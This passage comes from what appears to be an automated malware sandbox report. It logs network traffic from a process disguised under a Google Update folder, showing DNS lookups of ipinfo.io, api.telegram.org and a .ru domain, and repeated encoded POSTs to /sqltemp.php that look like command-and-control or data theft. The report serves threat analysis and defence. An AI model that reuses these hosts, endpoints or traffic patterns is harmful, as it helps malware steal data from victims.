                                                                                                                  Jan 1, 2025 16:06:00.622121096 CET6296080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:00.626951933 CET8062961104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:00.627161026 CET8062960104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:00.627187014 CET6296180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:00.627325058 CET6296180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:00.627327919 CET6296080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:00.632061958 CET8062961104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:00.986047029 CET6296180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:00.990979910 CET8062961104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.106311083 CET8062961104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.158866882 CET6296180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.281244993 CET8062961104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.329691887 CET6296180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.408709049 CET6296180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.409499884 CET6296280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.413789988 CET8062961104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.413894892 CET6296180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.414383888 CET8062962104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.414581060 CET6296280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.414860010 CET6296280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.419661045 CET8062962104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.598083019 CET6296380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.598288059 CET6296280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.602972031 CET8062963104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.603060961 CET6296380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.603204966 CET6296380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.607949972 CET8062963104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.647099018 CET8062962104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.730917931 CET6296480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.735904932 CET8062964104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.735991955 CET6296480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.736308098 CET6296480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.741106033 CET8062964104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.791996002 CET8062962104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.792057991 CET6296280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.954961061 CET6296380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:01.959942102 CET8062963104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:01.960118055 CET8062963104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:02.048789024 CET8062963104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:02.095339060 CET6296380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.096415043 CET6296480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.101246119 CET8062964104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:02.178248882 CET8062964104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:02.220320940 CET6296480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.227448940 CET8062963104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:02.282824039 CET6296380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.449987888 CET8062964104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:02.501602888 CET6296480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.576828957 CET6296380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.576829910 CET6296480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.576915979 CET6296580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.581880093 CET8062965104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:02.581902981 CET8062963104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:02.582130909 CET8062964104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:02.582304001 CET6296480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.582304955 CET6296380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.582305908 CET6296580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.582880974 CET6296580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.587732077 CET8062965104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:02.978880882 CET6296580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:02.983797073 CET8062965104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:03.044241905 CET8062965104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:03.238873959 CET6296580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:03.328718901 CET8062965104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:03.450872898 CET6296580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:03.454905987 CET6296680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:03.456062078 CET8062965104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:03.459033966 CET6296580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:03.459795952 CET8062966104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:03.463238001 CET6296680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:03.463507891 CET6296680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:03.468308926 CET8062966104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:03.814251900 CET6296680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:03.819220066 CET8062966104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:03.934742928 CET8062966104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:03.986012936 CET6296680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:04.102874994 CET8062966104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:04.157850981 CET6296680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:04.236514091 CET6296680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:04.237417936 CET6296780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:04.241658926 CET8062966104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:04.241733074 CET6296680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:04.242265940 CET8062967104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:04.242325068 CET6296780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:04.242455006 CET6296780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:04.247255087 CET8062967104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:04.595743895 CET6296780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:04.600636959 CET8062967104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:04.707252979 CET8062967104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:04.886568069 CET8062967104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:04.890883923 CET6296780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.015727043 CET6296780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.018882990 CET6296880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.021496058 CET8062967104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:05.022952080 CET6296780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.023741961 CET8062968104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:05.023885012 CET6296880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.023958921 CET6296880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.029408932 CET8062968104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:05.376737118 CET6296880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.382596970 CET8062968104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:05.477782965 CET8062968104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:05.545783997 CET6296880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.744887114 CET8062968104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:05.829750061 CET6296880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.858321905 CET6296880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.859016895 CET6296980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.863440037 CET8062968104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:05.863509893 CET6296880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.863846064 CET8062969104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:05.863907099 CET6296980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.864005089 CET6296980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:05.868701935 CET8062969104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:06.220417023 CET6296980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:06.225316048 CET8062969104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:06.335722923 CET8062969104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:06.423449039 CET6296980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:06.603777885 CET8062969104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:06.604881048 CET6296980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:06.609970093 CET8062969104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:06.610042095 CET6296980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:06.718898058 CET6297080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:06.723794937 CET8062970104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:06.723932981 CET6297080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:06.724005938 CET6297080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:06.728750944 CET8062970104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.079829931 CET6297080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:07.084774017 CET8062970104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.201608896 CET8062970104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.237328053 CET6297180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:07.237329960 CET6297080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:07.242239952 CET8062971104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.242327929 CET6297180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:07.242408991 CET8062970104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.242489100 CET6297080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:07.242518902 CET6297180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:07.247378111 CET8062971104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.358383894 CET6297280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:07.364296913 CET8062972104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.364471912 CET6297280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:07.364615917 CET6297280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:07.370354891 CET8062972104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.684756994 CET8062971104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.830961943 CET8062972104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.899105072 CET8062971104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:07.899332047 CET6297180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:07.923823118 CET6297280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:13.136395931 CET6297280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:13.136424065 CET6297180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:13.141370058 CET8062972104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:13.141381979 CET8062971104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:13.141520023 CET8062971104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:13.403512001 CET8062972104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:13.454715967 CET6297280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:13.518744946 CET8062971104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:13.564205885 CET6297180192.168.2.6104.21.38.84

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 1, 2025 16:02:08.424844027 CET6538653192.168.2.61.1.1.1
                                                                                                                  Jan 1, 2025 16:02:08.431603909 CET53653861.1.1.1192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.912743092 CET5035653192.168.2.61.1.1.1
                                                                                                                  Jan 1, 2025 16:02:09.920877934 CET53503561.1.1.1192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:15.374460936 CET5685953192.168.2.61.1.1.1
                                                                                                                  Jan 1, 2025 16:02:15.383860111 CET53568591.1.1.1192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.414805889 CET53556111.1.1.1192.168.2.6

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Jan 1, 2025 16:02:08.424844027 CET192.168.2.61.1.1.10x22cbStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                  Jan 1, 2025 16:02:09.912743092 CET192.168.2.61.1.1.10x77bbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 1, 2025 16:02:15.374460936 CET192.168.2.61.1.1.10xbcffStandard query (0)250345cm.renyash.ruA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Jan 1, 2025 16:02:08.431603909 CET1.1.1.1192.168.2.60x22cbNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                  Jan 1, 2025 16:02:09.920877934 CET1.1.1.1192.168.2.60x77bbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                  Jan 1, 2025 16:02:15.383860111 CET1.1.1.1192.168.2.60xbcffNo error (0)250345cm.renyash.ru104.21.38.84A (IP address)IN (0x0001)false
                                                                                                                  Jan 1, 2025 16:02:15.383860111 CET1.1.1.1192.168.2.60xbcffNo error (0)250345cm.renyash.ru172.67.220.198A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • ipinfo.io
                                                                                                                  • api.telegram.org
                                                                                                                  • 250345cm.renyash.ru

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.649735104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:15.394190073 CET301OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 344
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:15.751516104 CET344OUTData Raw: 05 05 01 05 03 0d 01 06 05 06 02 01 02 06 01 01 00 07 05 0a 02 03 03 00 07 02 0a 01 06 04 03 53 0e 07 04 5a 07 00 04 04 0e 51 07 56 00 03 05 0e 06 53 0d 0d 0e 01 07 04 07 07 04 06 05 02 00 09 03 07 0f 01 05 51 05 09 0b 02 0b 04 0e 03 0f 07 05 51
                                                                                                                  Data Ascii: SZQVSQQRYSW\L}U|^}_tLqweQhl[vY|slIloczcfS|tYc[}e~V@BxSfO~LW
                                                                                                                  Jan 1, 2025 16:02:15.855865002 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:16.139549017 CET1236INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UigMEW5PZkRsqhYjVW6BRnLbVbXa1b%2BMsgcj%2BXyOTDYQiHqos34p%2FN4fncEHNFhAW74sspKJ5P5MIR7bdA3jQwictnmwVpBREfnnEdrKO1ojvAV1gMM416%2FkoUCqLUxtAFnSVQa4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363accb7c0f84-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=9368&min_rtt=1533&rtt_var=16246&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=22734&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 35 34 38 0d 0a 56 4a 7d 59 78 6d 67 49 7b 61 7b 5d 68 4f 6b 49 7d 77 7c 53 7e 70 75 0c 6e 73 51 58 7d 5b 73 5c 77 05 66 50 7a 72 76 5e 62 65 77 5f 7e 71 78 01 55 4b 72 55 74 5c 68 59 7f 4c 57 06 7c 67 5f 51 79 76 55 54 7e 70 63 01 75 72 75 41 77 72 7d 47 68 58 69 5d 7e 6c 74 0d 69 67 7f 00 75 4c 7b 06 7c 5b 7d 48 7d 70 76 5a 78 67 77 59 7b 77 51 58 6f 6d 77 49 78 71 64 48 78 5a 62 41 7f 06 6f 5a 7b 5e 64 07 7e 5c 77 40 61 5f 52 03 7a 51 41 5b 6b 49 52 0a 68 71 58 52 75 42 73 5a 7b 6c 70 00 60 5e 71 50 7a 07 71 03 7e 42 57 5e 6c 61 66 00 75 73 7f 00 61 62 73 5d 76 62 62 50 7e 5d 7a 06 77 62 6d 04 61 65 52 09 7f 55 76 5c 77 6f 70 04 7e 70 7c 02 6f 6c 67 03 7b 4e 66 4b 7c 6d 5a 08 77 64 7c 05 7e 61 71 50 7e 43 6c 55 6f 7d 7d 5d 7f 61 65 4f 7b 5d 46 51 7c 6f 68 43 7d 59 77 55 6a 49 62 4c 6f 7d 60 59 78 72 7b 5c 7f 61 63 03 7d 59 60 52 6b 60 76 50 79 63 70 04 7f 61 78 05 60 5d 71 51 7b 5c 79 4a 75 48 64 4a 7e 58 70 06 7d 66 6d 4f 74 72 55 03 7c 72 57 05 7c 67 50 41 7b 66 6c 0c 7e 4d 67 01 75 4c 7d 06 77 [TRUNCATED]
                                                                                                                  Data Ascii: 548VJ}YxmgI{a{]hOkI}w|S~punsQX}[s\wfPzrv^bew_~qxUKrUt\hYLW|g_QyvUT~pcuruAwr}GhXi]~ltiguL{|[}H}pvZxgwY{wQXomwIxqdHxZbAoZ{^d~\w@a_RzQA[kIRhqXRuBsZ{lp`^qPzq~BW^lafusabs]vbbP~]zwbmaeRUv\wop~p|olg{NfK|mZwd|~aqP~ClUo}}]aeO{]FQ|ohC}YwUjIbLo}`Yxr{\ac}Y`Rk`vPycpax`]qQ{\yJuHdJ~Xp}fmOtrU|rW|gPA{fl~MguL}wO[H~qjI~|x~IYv_QHzb[~`_D{I|{IlOy}gKz\VzsrAN^xw|~Lowa|~|g}gh_mu||x|VHwpryO}G~RP{OvwcUDuqd
                                                                                                                  Jan 1, 2025 16:02:16.139569044 CET920INData Raw: 03 74 5f 54 08 7f 60 50 06 74 62 69 4c 76 65 78 0d 7f 52 61 07 77 52 70 4d 7f 4d 60 03 78 52 51 03 7a 60 7a 4a 7c 53 68 41 74 77 68 07 7e 5c 7a 0b 7c 7d 6f 0d 78 6d 7e 4c 7e 62 5b 06 7d 70 52 4f 7f 7c 5e 43 7f 60 60 40 7d 49 7e 07 78 53 59 49 7b
                                                                                                                  Data Ascii: t_T`PtbiLvexRawRpMM`xRQz`zJ|ShAtwh~\z|}oxm~L~b[}pRO|^C``@}I~xSYI{rpH|aU~IUO|Nyz]RB}LlFt]W{auvfp~XZfyvrwbq|wjxv|A}Mku\utOaJ~qz~lpC}IUvOH{Ly|p_{wxNywhxS{y\x{]\{]NZ{^gX}LoNv_l|oK^wU|y@uBZ{BdcpvyanZ~l
                                                                                                                  Jan 1, 2025 16:02:16.171900988 CET277OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 384
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:16.269342899 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:16.269892931 CET384OUTData Raw: 53 54 5a 57 54 58 54 5d 58 56 52 59 56 5f 59 57 5b 5e 54 58 55 5b 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: STZWTXT]XVRYV_YW[^TXU[P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3/="?'>(8=#./**$)-8Y!!,*+.&8,:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:02:16.533253908 CET963INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TXtPUE7IHcn6IFo1J%2FO4gIcAHHE8HJ8eX60hWEmf2q6nP8wa1GKFg1fCvweGb6Uk53%2FlEZmbSHXRQOdQ5LAbBzasm6nKA7Kxs4S0Tnl7xpuaaHvo%2FY7X7JtCu%2FHF8bajOhF%2BtzLt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363af6f0e0f84-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=12537&min_rtt=1471&rtt_var=18910&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2206&recv_bytes=1306&delivery_rate=2889182&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 0d 28 3d 21 0c 31 0c 28 1e 3f 3d 06 0f 32 00 26 11 3c 28 21 01 33 3d 27 10 3d 29 27 5c 35 2c 32 07 26 28 23 02 20 3d 20 01 24 1e 2b 59 05 1c 20 06 35 3c 34 13 2a 03 05 59 25 3f 07 11 27 3d 24 14 2b 16 28 1f 20 28 33 1d 24 3d 3c 5c 29 5c 20 52 33 3c 2f 17 2d 2c 32 0d 24 00 2c 54 00 11 26 55 27 0f 3c 5e 37 24 2f 02 20 22 39 5f 26 24 36 51 26 3c 2b 19 23 17 22 15 31 32 28 03 21 1d 08 5f 31 05 2a 00 21 2d 34 0a 3e 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&(=!1(?=2&<(!3='=)'\5,2&(# = $+Y 5<4*Y%?'=$+( (3$=<\)\ R3</-,2$,T&U'<^7$/ "9_&$6Q&<+#"12(!_1*!-4>%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.649741104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:16.426666021 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:16.783961058 CET1120OUTData Raw: 56 51 5a 53 51 5d 51 57 58 56 52 59 56 59 59 5f 5b 5b 54 5e 55 58 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQZSQ]QWXVRYVYY_[[T^UXPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$/%7%'.(,\=V - ()'>Y724(+%1<;:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:16.872229099 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:17.139561892 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZ1AJurBiJOcVEI4%2BeG3TxKyQdwjCyWIej78skGf1wwQM4VxcEUKNSnyqqrgQCqf3bvri1ziF9jdUG%2BBvHOIYH4axmlYR%2FgDMZBELtX4C%2Fn9A62m6eS5WlK9%2Fd7F6S4dSozlyTkv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
